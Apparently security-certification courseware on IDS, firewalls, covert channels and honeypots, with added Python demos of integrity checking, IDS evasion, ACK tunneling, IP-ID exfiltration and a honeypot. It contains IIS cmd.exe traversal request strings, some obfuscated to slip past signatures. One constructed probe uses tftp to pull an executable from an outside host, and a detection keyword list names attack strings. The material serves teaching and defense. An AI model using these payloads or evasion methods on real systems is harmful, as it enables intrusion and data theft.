- HIDS can be installed on many different types of machines; namely servers, workstations, and notebook computers
© System Integrity Verifiers (SIV) monitor system files to detect changes made by an intruder

© Tripwire is one of the popular SIVs

© SIVs may watch other components such as the Windows registry as well as cron configuration to detect unauthorized changes
Tripwire workflow (flowchart):

1. Install & customise Tripwire
2. Initialize Tripwire database
3. Run integrity check -> Changes found? (No: repeat step 3; Yes: step 4)
4. Examine Tripwire report -> Changes permitted?
5. Take appropriate security measure -> Policy file working?
7. Update policy file
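A minimal system integrity verifier that follows the same initialize/check cycle as the Tripwire flowchart above. This is an added example written for this page, not Tripwire's own code or code from the courseware: it hashes every regular file under a root directory into a baseline (path to SHA-256), re-scans, and reports added, removed and modified files. The directory tree, file contents and the simulated intrusion in demo() are constructed so the example runs offline.

```python
"""Minimal system integrity verifier (SIV) in the spirit of Tripwire.

Added example, not part of the original courseware and not Tripwire's own
code. Baseline = {relative path: sha256}. A second scan is compared against
it. demo() builds a throw-away tree with constructed files, takes a baseline,
simulates an intruder, and returns the report an operator would examine.
"""
import hashlib
import os
import shutil
import tempfile


def sha256_file(path, chunk_size=65536):
    """Return the hex SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Walk root and return {relative_path: sha256} for every regular file."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def check_integrity(root, baseline):
    """Re-scan root and compare with baseline.

    Returns sorted lists under 'added', 'removed' and 'modified'.
    """
    current = build_baseline(root)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(current) & set(baseline)
                      if current[p] != baseline[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline, then a trojaned binary, a dropped
    backdoor and a wiped log. Returns the integrity report."""
    root = tempfile.mkdtemp(prefix="siv_demo_")
    try:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "etc", "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"\x7fELF-original-ls")
        with open(os.path.join(root, "audit.log"), "w") as f:
            f.write("boot ok\n")

        baseline = build_baseline(root)          # step 2: initialize database

        # Simulated intrusion (constructed): trojaned ls, new backdoor, log removed
        with open(os.path.join(root, "bin", "ls"), "wb") as f:
            f.write(b"\x7fELF-trojaned-ls")
        with open(os.path.join(root, "bin", "backdoor"), "wb") as f:
            f.write(b"\x7fELF-backdoor")
        os.remove(os.path.join(root, "audit.log"))

        return check_integrity(root, baseline)   # step 3: integrity check
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The baseline is the weak point of any SIV: an intruder with root can simply regenerate it. Keep it on read-only media or signed (Tripwire signs its database and policy file), and run the check from a trusted schedule rather than from the possibly compromised host's own cron.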
True/False, Positive/Negative

© True positive: an alarm was generated, and a present condition should be alarmed

© False positive: an alarm was generated, but there is no condition present to warrant one

© True negative: an alarm was NOT generated, and there is no condition present to warrant one

© False negative: an alarm was NOT generated, but a present condition should be alarmed

Source: The Practical Intrusion Detection Handbook by Paul E. Proctor

Copyright © by EC-Council. All Rights reserved. Reproduction is strictly prohibited



Intrusion Detection Tools

© Snort 2.10

© Symantec ManHunt

© LogIDS 1.0

© SnoopNetCop Standard

© Prelude Hybrid IDS version 0.8.x

© Samhain
Snort 2.10

© Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks

© It can perform protocol analysis and content searching/matching, and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts
[Screenshot: Snort alert console (last update 2002-07-11 13:25:14) showing alert counts for the last 5/15/30/60 minutes and in total, graphs of attacks over the last 60 minutes and 24 hours, and the top attacks of the last 24 hours by signature: MISC Large ICMP Packet, ICMP PING speedera, WEB-IIS cmd.exe access, ICMP Destination Unreachable, SCAN nmap TCP, WEB-CGI calendar access, spp_portscan portscan status, WEB-MISC http directory traversal, ICMP redirect host, ICMP Source Quench, SCAN Proxy attempt, WEB-FRONTPAGE /_vti_bin access]
IDS: Symantec ManHunt

© Symantec ManHunt provides high-speed network intrusion detection and real-time analysis and protects networks from internal and external intrusion and denial of service attacks

© The new version has support for the Red Hat Linux operating system

© It is scalable and flexible to deploy, thus reducing the total cost of ownership

© It uses the protocol anomaly detection method to sense an intrusion
LogIDS 1.0

© LogIDS is a log-analysis-based intrusion detection system which shows real-time analysis of centralized logs

© The graphical interface represents the network map, where each node has a console window through which the logs belonging to the respective node can be displayed
[Screenshot: LogIDS admin console showing a network map (Internet/External Net, DMZ, INTRA, DNS1, WEBA, IDS1, PDC1, BDC1, WWW, Web and Mail nodes), each node with its own console window reporting "object definition loaded"]
SnoopNetCop Standard

© SnoopNetCop is a program that can detect possible packet sniffing attacks on the network

© It is a program to detect LAN cards operating in promiscuous mode on the network



SnoopNetCop Standard Version 



File Scan Detect Option Help Exit 



'indows 



Host Name 



IP 



lUnl<.noiwn 

J CHIEF 

J VI R JANG 

JP0RSCHE911 

jUnkno™ 

JHJKIM 

JHAKSHIN 

JDS3JEL 

jUnknom 

JKGKIM 

1FX0773CG 



211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 
211.248 




Detection Results 



I Warning! 
} Warning! 



I Warning! 
} Warning! 



II 



Detection starts at £003-03-07 £3 9:49:56 Using MAC Address : FF:FF:OCh _^ 
00:00:00 

possibly running Sniffer or IDS, 
is possibly running Sniffer or IDS 
is possibly running Sniffer or IDS, 
is possibly running Sniffer or IDS, 



Warning 
Warning 
Warning 
Warning 



CHIEF [211,241 
VIRJANG [211. 2' 
DS3JEL [211.241 
HJKIM [211,248[ 




Detect Sniffers automaticaiiy. 
Prelude Hybrid IDS Version 0.8.x

© Prelude Hybrid IDS Version 0.8.x acts as both a network-based IDS and a host-based IDS

© This version contains the following new, generic features:

• Includes hybrid components (HIDS as well as NIDS)

• Split and reorganized components

• Supports all BSD-supported systems

• Supports big-endian architectures

• Supports architectures requiring memory-aligned access
Samhain

© Samhain is an open source file integrity and host-based intrusion detection system for Unix and Linux

© It uses cryptographic checksums of files to detect modifications

© It can detect kernel rootkits for Linux and FreeBSD
Steps to Perform After an IDS Detects an Attack

© Configure a firewall to filter out the IP address of the intruder (with care: an attacker who spoofs source addresses can use automatic blocking to get legitimate hosts cut off)

© Alert the user/administrator (sound/e-mail/page)

© Write an entry in the event log. Send an SNMP Trap datagram to a management console like Tivoli

© Save the attack information (timestamp, intruder IP address, victim IP address/port, protocol information)

© Save a tracefile of the raw packets for later analysis

© Launch a separate program to handle the event

© Terminate the TCP session: forge a TCP FIN or RST packet to forcefully terminate the connection
Evading IDS Systems

© Many simple network intrusion detection systems rely upon "pattern matching"

© Attack scripts have well-known patterns, so simply compiling a database of the output of known attack scripts provides pretty good detection, but it can be easily evaded by simply changing the script

© IDS evasion focuses on foiling signature matching by altering an attacker's appearance

For example, some POP3 servers are vulnerable to a buffer overflow when a long password is entered. A signature that looks for the original exploit's payload is easy to evade simply by changing the attack script

Ways to Evade IDS

© Insertion
© Evasion
© Denial-of-service
© Complex attacks
© Obfuscation
© Desynchronization - post-connection SYN
© Desynchronization - pre-connection
© Fragmentation
© Session splicing
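Session splicing and obfuscation from the list above, run against two detectors: a naive per-packet pattern matcher of the kind the slide criticizes, and a stream-aware matcher that reassembles the TCP segments and normalizes URL encoding before matching. This is an added example written for this page, not code from the courseware or from any IDS product; the HTTP request, the signature string and the segment sizes are constructed for the demonstration.

```python
"""Session splicing and URL obfuscation versus a pattern-matching NIDS.

Added example, not part of the original courseware or of any IDS vendor's
code. naive_match() looks for the signature inside each segment on its own;
stream_match() reassembles segments in sequence order, decodes URL encoding
until stable and matches case-insensitively, which is what a real NIDS HTTP
preprocessor has to do. Request strings and signature are constructed.
"""
from urllib.parse import unquote

# Signature an IDS might use for the classic IIS cmd.exe traversal attack.
SIGNATURE = "/winnt/system32/cmd.exe"


def splice(payload, chunk_size):
    """Split payload into (seq, chunk) pieces, one per TCP segment."""
    return [(i, payload[i:i + chunk_size])
            for i in range(0, len(payload), chunk_size)]


def naive_match(segments, signature):
    """Per-segment matcher: fires only if the whole string is in one segment."""
    return any(signature in chunk for _seq, chunk in segments)


def normalise_http(data):
    """Undo URL encoding (including double encoding) and backslash paths."""
    prev = None
    while prev != data:          # decode until stable to defeat %25xx tricks
        prev, data = data, unquote(data)
    return data.replace("\\", "/").lower()


def stream_match(segments, signature):
    """Reassemble segments by sequence number, normalise, then match."""
    stream = "".join(chunk for _seq, chunk in sorted(segments))
    return signature.lower() in normalise_http(stream)


# Constructed attacker requests: plain, and with double-encoded traversal
# plus URL-encoded "cmd".
PLAIN = "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n"
OBFUSCATED = ("GET /scripts/..%255c../winnt/system32/%63%6d%64.exe?/c+dir"
              " HTTP/1.0\r\n\r\n")


def evaluate():
    """Return which detector alerts on which evasion (True = alert)."""
    spliced = splice(PLAIN, 4)             # 4 bytes per segment
    shuffled = list(reversed(spliced))     # segments arriving out of order
    return {
        "plain_naive": naive_match(splice(PLAIN, 2000), SIGNATURE),
        "spliced_naive": naive_match(spliced, SIGNATURE),
        "spliced_stream": stream_match(shuffled, SIGNATURE),
        "obfuscated_naive": naive_match(splice(OBFUSCATED, 2000), SIGNATURE),
        "obfuscated_stream": stream_match(splice(OBFUSCATED, 2000), SIGNATURE),
    }


if __name__ == "__main__":
    for case, alerted in evaluate().items():
        print(f"{case:18s} alert={alerted}")
```

The naive detector alerts only when the unmodified request arrives in a single segment; the reassembling, normalizing detector alerts in every case. Reassembly is exactly where insertion and evasion attacks then aim: the IDS must reassemble the same way the target host does, or it can be fed segments the host will discard (insertion) or miss ones the host will accept (evasion).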
Tools to Evade IDS

© Sidestep

© ADMutate

© Mendax v.0.7.1

© Stick

© Fragrouter

© Anzen NIDSbench
IDS Evading Tool: ADMutate

http://www.ktwo.ca/security.html

© ADMutate accepts a buffer overflow exploit as input and randomly creates a functionally equivalent version which bypasses IDS

© Once a new attack is known, it usually takes the IDS vendors a number of hours or days to develop a signature. But in the case of ADMutate, it has taken months for signature-based IDS vendors to add a way to detect a polymorphic buffer overflow generated by it
IDS Software Vendors

© BlackICE by Network ICE (http://www.networkice.com)

© CyberCop Monitor by Network Associates, Inc. (http://www.nai.com)

© RealSecure by Internet Security Systems (ISS) (http://www.iss.net)

© NetRanger by WheelGroup/Cisco (http://www.wheelgroup.com)

© eTrust Intrusion Detection by Computer Associates (http://www.cai.com)

© NetProwler by Axent (http://www.axent.com)

© Centrax by Cybersafe (http://www.cybersafe.com)

© NFR by Network Flight Recorder (http://www.nfr.net)

© Dragon by Security Wizards (http://www.network-defense.com)
Packet Generators

© Aicmpsend 1.10 (http://www.elxsi.de/)

© Blast v2.0 (http://www.foundstone.com/rdlabs/blastbeta.html)

© CyberCop Scanner's CASL (http://www.nai.com)

© Ettercap 0.1.0 (http://ettercap.sourceforge.net/)

© Hping2 beta 54 (http://www.kyuzz.org/antirez/hping/)

© ICMPush 2.2 (http://hispahack.ccc.de/)

© IPsend (http://www.coombs.anu.edu.au/~avalon)

© Libnet (http://www.packetfactory.net/libnet)

© MGEN Toolset 3.2 (http://manimac.itd.nrl.navy.mil/MGEN/)

© Net::RawIP (http://www.quake.skif.net/RawIP)

© SING 1.1 (http://sourceforge.net/projects/sing)
What is a Firewall?

© A combination of hardware and software that secures access to and from the LAN

© There are three main types of firewall architecture:

• Packet filtering (stateless: each packet is judged on its own header fields)

• Proxy-based (an application-level gateway terminates the client's connection and opens a new one on its behalf)

• Stateful packet filtering (keeps a connection table and only admits packets that belong to a known, valid connection)
Firewall Identification

© Listed below are a few techniques that can be used to effectively determine the type, version, and rules of almost every firewall on a network

• Port scanning

• Firewalking

• Banner grabbing
Firewalking

© Firewalking is a method used to collect information about remote networks that are behind firewalls

© It probes the ACLs on packet-filtering routers/firewalls: the firewalking host sends TCP or UDP probes toward the destination with the IP TTL set to one hop beyond the gateway. If the gateway's ACL passes the probe, the next hop answers with an ICMP "TTL exceeded" message, revealing that the port is open through the filter; if nothing comes back, the port is filtered

© Firewalking requires three hosts:

• Firewalking host

• Gateway host

• Destination host

[Diagram: firewalking host → gateway host at hop n → destination host at hop n+m (m>1)]
Banner Grabbing

© Banners are messages sent out by network services during connection to the service

© Banners announce which service is running on the system, often with its version

© Banner grabbing is a very simple method of OS and service detection

© Banner grabbing also helps in detecting services run by firewalls (for example, a proxy firewall's own SMTP or FTP relay answers in place of the real server)

© The three main services which send out banners are FTP, telnet, and web servers

© Example of SMTP banner grabbing:

telnet mail.targetcompany.org 25

The 220 greeting line the mail server returns is the banner. Administrators can change or remove banners, so treat them as a hint, not proof
Breaching Firewalls

© One of the easiest and most common ways for an attacker to slip by a firewall is by installing some network software on an internal system that communicates using a port address permitted by the firewall's configuration

© A popular port to use is TCP port 53, normally used by DNS

© Many firewalls permit all traffic using port 53 by default because it simplifies firewall configuration and reduces support calls
Bypassing a Firewall Using Httptunnel

© Httptunnel creates a bi-directional virtual data path tunneled in HTTP requests. The requests can be sent via an HTTP proxy, if desired

[...]\httptunnel 3.3>htc --help
Usage: htc [OPTION]... HOST[:PORT]
Set up a httptunnel connection to PORT at HOST (default port is 8888).
When a connection is made, I/O is redirected from the source specified
by the device, forward-port or stdin-stdout switch to the tunnel.

  -A, --proxy-authorization USER:PASSWORD  proxy authorization
  -z, --proxy-authorization-file FILE      proxy authorization file
  -B, --proxy-buffer-size BYTES            assume a proxy buffer size of BYTES bytes
                                           (k, M, and G postfixes recognized)
  -c, --content-length BYTES               use HTTP PUT requests of BYTES size
                                           (k, M, and G postfixes recognized)
  -d, --device DEVICE                      use DEVICE for input and output
  -F, --forward-port PORT                  use TCP port PORT for input and output
  -h, --help                               display this help and exit
  -k, --keep-alive SECONDS                 send keepalive bytes every SECONDS seconds
                                           (default is 5)
  -M, --max-connection-age SEC             maximum time a connection will stay
                                           open is SEC seconds (default is 300)
  -P, --proxy HOSTNAME[:PORT]              use a HTTP proxy (default port is 8080)
  -s, --stdin-stdout                       use stdin/stdout for communication
                                           (implies --no-daemon)
  -S, --strict-content-length              always write Content-Length bytes in requests
  -T, --timeout TIME                       timeout, in milliseconds, before sending
                                           padding to a buffering proxy
  -U, --user-agent STRING                  specify User-Agent value in HTTP requests
  -V, --version                            output version information and exit
  -w, --no-daemon                          don't fork into the background
Placing Backdoors Through Firewalls

The Reverse WWW Shell

© This backdoor should work through any firewall that allows users to surf the WWW. A program is run on the internal host, which spawns a child every day at a special time

© For the firewall, this child acts like a user using the browser client to surf the Internet. In reality, this child executes a local shell and connects to the WWW server operated by the hacker on the Internet via a legitimate-looking HTTP request, and sends a stand-by signal

© The legitimate-looking answer of the WWW server operated by the hacker is, in reality, the command the child will execute on its machine in the local shell
Hiding Behind a Covert Channel: LOKI

© LOKI is an information tunneling program. LOKI uses Internet Control Message Protocol (ICMP) echo response packets to carry its payload. ICMP echo response packets are normally received by the ping program, and many firewalls permit responses to pass

© Simple shell commands are used to tunnel inside ICMP_ECHO/ICMP_ECHOREPLY and DNS name lookup query/reply traffic. To the network protocol analyzer, this traffic seems like ordinary benign packets of the corresponding protocol. However, to the correct listener (the LOKI2 daemon), the packets are recognized for what they really are
ACK Tunneling

© Trojans normally use ordinary TCP or UDP communication between their client and server parts

© Any firewall between the attacker and the victim that blocks incoming traffic will usually stop such Trojans from working. ICMP tunneling has existed for quite some time now, and blocking ICMP at the firewall is the usual defense against it

© ACK tunneling works through firewalls that do not apply their rule sets to TCP ACK segments (ordinary stateless packet filters, which let "established" traffic through by looking only at the ACK flag, belong to this class of firewalls). A stateful firewall that checks each inbound segment against its connection table drops such bare ACK segments
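The difference between the packet-filtering and stateful architectures from the "What is a Firewall?" slide is exactly what decides whether the ACK tunneling described above gets through. The following is an added example written for this page, not code from the courseware or from AckCmd: two simplified filter models, one stateless with the classic "established" rule (any inbound segment carrying ACK is assumed to be a reply) and one stateful (inbound segments must match a connection opened from the inside). Addresses, ports and the traffic are constructed.

```python
"""Why ACK tunnelling passes a stateless packet filter but not a stateful one.

Added example, not part of the original courseware and not AckCmd's code.
StatelessFilter models a plain packet filter with an 'established' rule;
StatefulFilter keeps a connection table populated by outbound SYNs. Both are
deliberately simplified (no sequence-number checks, no timeouts).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str          # e.g. "S", "SA", "A", "PA"
    inbound: bool       # True when arriving from the untrusted side


class StatelessFilter:
    """Rule set of an ordinary packet filter: allow out, allow published
    inbound ports, allow any inbound TCP segment with the ACK flag set."""

    def __init__(self, allowed_inbound_ports=()):
        self.allowed_inbound_ports = set(allowed_inbound_ports)

    def accept(self, seg):
        if not seg.inbound:
            return True
        if seg.dport in self.allowed_inbound_ports:
            return True
        # No connection table: ACK alone is taken as proof of a reply.
        return "A" in seg.flags


class StatefulFilter:
    """Tracks connections opened from the inside; inbound must match one."""

    def __init__(self, allowed_inbound_ports=()):
        self.allowed_inbound_ports = set(allowed_inbound_ports)
        self.table = set()   # (inside_ip, inside_port, outside_ip, outside_port)

    def accept(self, seg):
        if not seg.inbound:
            if "S" in seg.flags and "A" not in seg.flags:   # new outbound SYN
                self.table.add((seg.src, seg.sport, seg.dst, seg.dport))
            return True
        if seg.dport in self.allowed_inbound_ports:
            return True
        key = (seg.dst, seg.dport, seg.src, seg.sport)
        return key in self.table      # only replies to tracked connections


def run_scenario(fw):
    """One legitimate browse plus one ACK-tunnel probe through filter fw."""
    # Inside host opens a connection to an outside web server.
    syn = Segment("10.0.0.5", 40001, "203.0.113.10", 80, "S", inbound=False)
    synack = Segment("203.0.113.10", 80, "10.0.0.5", 40001, "SA", inbound=True)
    # Attacker sends a bare ACK segment to a port with no open connection,
    # the way an ACK-tunnelling client reaches its server component.
    ack_probe = Segment("198.51.100.7", 5555, "10.0.0.5", 1054, "A", inbound=True)
    fw.accept(syn)
    return {"legit_reply": fw.accept(synack),
            "ack_tunnel": fw.accept(ack_probe)}


def compare():
    """Verdicts per filter type; True means the segment was let through."""
    return {"stateless": run_scenario(StatelessFilter()),
            "stateful": run_scenario(StatefulFilter())}


if __name__ == "__main__":
    print(compare())
```

Both filters admit the genuine SYN/ACK reply; only the stateless one admits the attacker's bare ACK. A real stateful firewall also checks sequence and acknowledgement numbers against the connection's window and ages entries out, which this model leaves out.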
© 007 Shell

• 007 Shell is a covert shell ICMP tunneling program. It works similarly to LOKI

• 007 Shell works by putting data streams in the ICMP message past the usual 4 bytes (8-bit type, 8-bit code, and 16-bit checksum)

© ICMP Shell

• ICMP Shell (ISH) is a telnet-like protocol. It provides the capability of connecting to a remote host to open a shell using only ICMP for input and output

• The ISH server runs as a daemon on the server side. When the server receives a request from the client, it will strip the header and look at the ID field. If it matches the server's ID, then it will pipe the data to "/bin/sh"

• It will then read the results from the pipe and send them back to the client, where the client then prints the data to stdout
Tools to Breach Firewalls

© AckCmd

• AckCmd is a client/server combination for Windows 2000 that opens a remote command prompt to another system (running the server part of AckCmd)

• It communicates using only TCP ACK segments. This way the client component is able to directly contact the server component through a firewall in some cases

[Screenshot: two cmd.exe windows in the "Module 19 - Hacking VPN, Routers and Firewalls\ackcmd" lab directory, one running ackcmds (the server) and one running "ackcmdc 127.0.0.7" (the client). Client banner: "AckCmd 1.1 - The Ack Command Prompt for Windows 2000 - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu - For instructions see http://ntsecurity.nu/toolbox/ackcmd/ - Type "quit" and press Enter to quit", followed by an AckCmd> prompt]
Tools to Breach Firewalls

© Covert_TCP 1.0

• Covert_TCP 1.0 manipulates the TCP/IP header to transfer a file, one byte at a time, to a destination host

• Data can be transmitted by concealing it in the IP header

• This technique helps in breaching a firewall from inside, as well as exporting data with innocent-looking packets that contain insufficient data for sniffers or firewalls to analyze
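The Covert_TCP idea above, one byte of the file per packet hidden in a header field, together with the detection heuristic a defender would use against it. This is an added example written for this page, not the Covert_TCP tool's own code or code from the courseware: it builds a genuine IPv4 header per byte with the byte in the 16-bit Identification field, decodes the message back, and flags a flow whose IP IDs look like a run of printable ASCII. Addresses and the secret are constructed; nothing is sent on the wire.

```python
"""Covert_TCP-style channel: one byte per packet hidden in the IP ID field.

Added example, not part of the original courseware and not Covert_TCP's
code. encode_message() emits one IPv4 header per byte (ID field = byte),
decode_packets() reads them back, and detect_ascii_ids() is the defender's
check: normal stacks use incrementing or random IDs, so a run of IDs that
are all 0x20..0x7e (printable ASCII, high byte zero) stands out.
"""
import struct


def ip_checksum(header):
    """RFC 1071 one's-complement sum over 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, ident, proto=6, payload_len=20, ttl=64):
    """Return a 20-byte IPv4 header (no options) with a valid checksum."""
    ver_ihl = (4 << 4) | 5
    total_len = 20 + payload_len
    src_b = bytes(int(x) for x in src.split("."))
    dst_b = bytes(int(x) for x in dst.split("."))
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident, 0,
                      ttl, proto, 0, src_b, dst_b)
    csum = ip_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def encode_message(src, dst, message):
    """One packet per byte, the byte carried in the IP Identification field."""
    return [build_ipv4_header(src, dst, ident=b) for b in message.encode()]


def ip_id(header):
    """Extract the Identification field from a raw IPv4 header."""
    return struct.unpack("!H", header[4:6])[0]


def decode_packets(headers):
    """Recover the message from the ID field of each header, in order."""
    return bytes(ip_id(h) & 0xFF for h in headers).decode()


def detect_ascii_ids(headers, min_run=8):
    """True when min_run consecutive packets all carry a printable-ASCII ID."""
    run = 0
    for h in headers:
        run = run + 1 if 0x20 <= ip_id(h) <= 0x7E else 0
        if run >= min_run:
            return True
    return False


def demo():
    """Constructed exfiltration of a short secret plus the detector's verdicts."""
    secret = "db_pass=hunter2"
    covert = encode_message("10.0.0.5", "198.51.100.7", secret)
    # A benign flow with incrementing IDs, as many stacks generate them.
    benign = [build_ipv4_header("10.0.0.5", "203.0.113.10", ident=0x4E20 + i)
              for i in range(len(secret))]
    return {
        "recovered": decode_packets(covert),
        # Re-summing a header that includes its checksum must give 0.
        "checksum_ok": all(ip_checksum(h) == 0 for h in covert),
        "covert_flagged": detect_ascii_ids(covert),
        "benign_flagged": detect_ascii_ids(benign),
    }


if __name__ == "__main__":
    print(demo())
```

The detector is a heuristic, not a signature: a stack that randomizes IP IDs will occasionally produce printable values, which is why it requires a run rather than a single packet, and a sender that XORs the payload with a key defeats it. The robust defense is the one the slide implies, a firewall or proxy that rewrites outbound headers (NAT and application proxies both reassign the ID field).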






Common Tool for Testing Firewalls and IDS

© Firewall Tester

• Written by Andrea Barisani, who is a system administrator and security consultant

• Firewall Tester is a tool designed for testing firewalls and intrusion detection systems

• It is based on a client/server architecture for generating real TCP/IP connections

• The client is a packet generator tool (ftest), while the server (ftestd) is an intelligent network listener capable of processing and replying to ftest-generated packets. All packets generated by ftest have a special signature encoded in the payload that permits identification
What Is a Honeypot?

© A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource

© It has no production value; anything going to or from a honeypot is likely a probe, attack, or compromise

© A honeypot can be used to log access attempts to its ports, including the attacker's keystrokes. This can give advance warning of a more concerted attack
The Honeynet Project

© Founded in April 1999, "The Honeynet Project" is a non-profit research organization of security professionals dedicated to information security

© All the work of the organization is open source and shared with the security community

© The Project intends to provide additional information on hackers, such as their motives in attacking, how they communicate, when they attack systems, and their actions after compromising a system

© The Honeynet Project is a four-phased project
Types of Honeypots

© Honeypots are classified into two basic categories:

• Low-interaction honeypot

Eg: Specter, Honeyd, and KFSensor

• High-interaction honeypot

Eg: Honeynets
Advantages and Disadvantages of a Honeypot

© Advantages are:

• Collects small data sets of high value

• Reduces false positives

• Catches new attacks, reduces false negatives

• Works in encrypted or IPv6 environments

• Simple concept requiring minimal resources

© Disadvantages are:

• Limited field of view (microscope)

• Risk (mainly high-interaction honeypots)
Where to Place a Honeypot?

© A honeypot is usually placed in front of the firewall or in the DMZ; one placed inside the internal network yields the most valuable alerts but also carries the most risk if it is compromised

© Check for the following while placing honeypots:

• Router-addressable

• Static address

• Not subjected to a fixed location for a long time






Honeypots

There are both commercial and open source honeypots available on the Internet

© Commercial honeypots

• KFSensor

• NetBait

• ManTrap

• Specter

© Open source honeypots

• Bubblegum Proxypot

• Jackpot

• BackOfficer Friendly

• Bait-n-Switch

• Bigeye

• HoneyWeb

• Deception Toolkit

• LaBrea Tarpit

• Honeyd

• Honeynets

• Sendmail SPAM Trap

• Tiny Honeypot
Honeypot: SPECTER

© SPECTER is a smart honeypot or deception system

© SPECTER automatically investigates the attackers while they are still trying to break in
Honeypot: honeyd

© Honeyd is maintained and developed by Niels Provos, a software engineer at Google

© Honeyd is a small daemon that creates virtual hosts on a network

© Honeyd is open source software released under the GNU General Public License
Honeypot: KFSensor

KFSensor is a host-based Intrusion Detection System (IDS) that acts as a honeypot to attract and log potential hackers and port-scanner kiddies by simulating vulnerable system services and even Trojans
[Screenshot: KFSensor console with status legend (server running/stopped/error; ports and visitors by recency of activity; events normal/alert/high alert) and an event detail window. Event ID 418, type Connection, 17/12/2002 18:45:36: visitor 217.39.205.180 port 4779 (host217-39-205-180.in-addr.btopenworld.com) to sensor 217.39.97.38, port 80/TCP, sim server "http Apache", action SimBanner, closed by server. Received: "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2..." with "Host: www" and "Connection: close". Response: "HTTP/1.1 200 OK", "Date: Tue, 17 Dec 2002 18:45:36 GMT", "Server: Apache/2.0.39 (Win32)", "Connection: close"]
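The KFSensor event above (a fake Apache banner returned to a cmd.exe traversal probe) and the banner grabbing slide earlier in this module are the two sides of one exchange. The following is an added example written for this page, not KFSensor's code or code from the courseware: a low-interaction HTTP honeypot that logs whatever the visitor sends and answers with a constructed Apache-style banner, plus a grab_banner() client that pulls the Server header the way an attacker would. demo() runs both on 127.0.0.1 with an ephemeral port; the probe request is constructed to resemble the one KFSensor logged.

```python
"""Low-interaction HTTP honeypot plus the banner grab run against it.

Added example, not part of the original courseware and not KFSensor's code.
HttpHoneypot accepts one connection, records the request and its source,
replies with a fake Apache banner and closes. grab_banner() is the
attacker's side. The fake response and the probe request are constructed.
"""
import socket
import threading

FAKE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                 b"Server: Apache/2.0.39 (Win32)\r\n"
                 b"Connection: close\r\n"
                 b"Content-Length: 0\r\n\r\n")


class HttpHoneypot:
    """Single-port sensor: log the request, send a simulated banner."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))          # port 0: let the OS pick one
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.events = []                      # (visitor_ip, visitor_port, data)

    def serve_one(self):
        conn, peer = self.sock.accept()
        with conn:
            conn.settimeout(2.0)
            data = b""
            try:
                while b"\r\n\r\n" not in data and len(data) < 4096:
                    chunk = conn.recv(1024)
                    if not chunk:
                        break
                    data += chunk
            except socket.timeout:
                pass                           # log whatever arrived
            self.events.append((peer[0], peer[1], data))
            conn.sendall(FAKE_RESPONSE)

    def alerts(self):
        """Every connection to a honeypot is suspect; rank the obvious ones."""
        out = []
        for ip, port, data in self.events:
            text = data.decode("latin-1")
            high = any(t in text.lower() for t in ("cmd.exe", "/etc/passwd", "..%"))
            out.append({"visitor": f"{ip}:{port}",
                        "request_line": text.split("\r\n", 1)[0],
                        "severity": "high" if high else "normal"})
        return out

    def close(self):
        self.sock.close()


def grab_banner(host, port, request=b"HEAD / HTTP/1.0\r\n\r\n", timeout=3.0):
    """Connect, send a request, return the Server header value (or None)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        raw = b""
        while True:
            chunk = s.recv(1024)
            if not chunk:
                break
            raw += chunk
    for line in raw.split(b"\r\n"):
        if line.lower().startswith(b"server:"):
            return line.split(b":", 1)[1].strip().decode()
    return None


def demo():
    """Run the honeypot in a thread and hit it with a constructed probe."""
    hp = HttpHoneypot()
    t = threading.Thread(target=hp.serve_one)
    t.start()
    probe = (b"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20"
             b"198.51.100.7%20GET%20x.exe HTTP/1.0\r\nHost: www\r\n\r\n")
    banner = grab_banner("127.0.0.1", hp.port, request=probe)
    t.join()
    hp.close()
    return {"banner": banner, "alerts": hp.alerts()}


if __name__ == "__main__":
    print(demo())
```

The honeypot never executes anything it receives, which is what keeps a low-interaction sensor safe to expose; the price is that an attacker who sends a second request, or probes for Apache behaviour beyond the banner, can tell it is a fake, which is one of the honeypot detection techniques this module goes on to list.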
Sebek

© Sebek is a data capture tool

© The first versions of Sebek were designed to collect keystroke data from directly within the kernel

© Sebek also provides the ability to monitor the internal workings of the honeypot in a glass-box manner, as compared to the previous black-box techniques
Honeywall

